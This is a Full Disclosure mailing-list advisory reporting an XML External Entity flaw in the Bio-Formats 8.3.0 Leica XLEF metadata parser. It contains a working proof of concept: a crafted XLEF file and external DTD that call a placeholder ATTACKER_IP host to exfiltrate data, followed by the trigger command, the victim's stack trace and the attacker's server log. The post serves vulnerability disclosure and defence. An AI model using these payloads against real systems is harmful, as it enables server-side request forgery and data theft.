Message-ID: <CAFmK-Gzm5zuCmCcKaDmNHdzHe_yRt_ikUKiwVVvJirWFG3g7sA@mail.gmail.com>
Date: Mon, 29 Dec 2025 22:56:29 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Bioformats v8.3.0 Improper Restriction of XML External Entity Reference in Bio-Formats Leica Microsystems XML Parser
Bio-Formats contains an XML External Entity (XXE) vulnerability in the
Leica Microsystems metadata parsing component. The vulnerability is caused
by the use of an insecurely configured DocumentBuilderFactory when
processing Leica XML-based metadata files (e.g., XLEF). When a crafted XML
file is supplied, the parser allows external entity resolution and external
DTD loading, enabling attackers to trigger arbitrary outbound network
requests, access local system resources, or cause a denial-of-service
condition during XML parsing.
*Impact:*
An attacker who can supply a crafted Leica XML metadata file may:
* Trigger XML External Entity (XXE) injection
* Perform server-side request forgery (SSRF) via outbound HTTP requests
* Access local files where XML-safe content exists
* Cause denial of service through entity expansion or parser instability
* Exfiltrate data through blind out-of-band channels
Exploitation occurs during XML parsing and does not require authentication.
*Proof of Concept:*
Malicious XLEF File
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY % ext SYSTEM "http://ATTACKER_IP:8000/evil.dtd">
%ext;
]>
<xlef>
<Image>&exfil;</Image>
</xlef>
Attacker-Controlled External DTD (evil.dtd)
<!ENTITY exfil SYSTEM "http://ATTACKER_IP:8000/exfil?data=ubuntu">
*Exploit Execution:*
java -cp bioformats_package.jar \
loci.formats.tools.ImageInfo xxe_blind.xlef
*Observed Exploit Output:*
Victim Application Output
Initializing reader
XLEFReader initializing xxe_blind.xlef
http://ATTACKER_IP:8000/exfil?data=ubuntu
java.io.FileNotFoundException: http://ATTACKER_IP:8000/exfil?data=ubuntu
at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity
at org.apache.xerces.impl.XMLEntityManager.startEntity
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset
at javax.xml.parsers.DocumentBuilder.parse
at LMSXmlDocument.initFromFilepath(LMSXmlDocument.java:125)
Attacker HTTP Server Log
192.x.x.x - - [23/Dec/2025 23:28:19] "GET /exfil?data=ubuntu HTTP/1.1" 404 -
The outbound HTTP request confirms that the XML parser resolved
attacker-controlled external entities during file parsing.
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/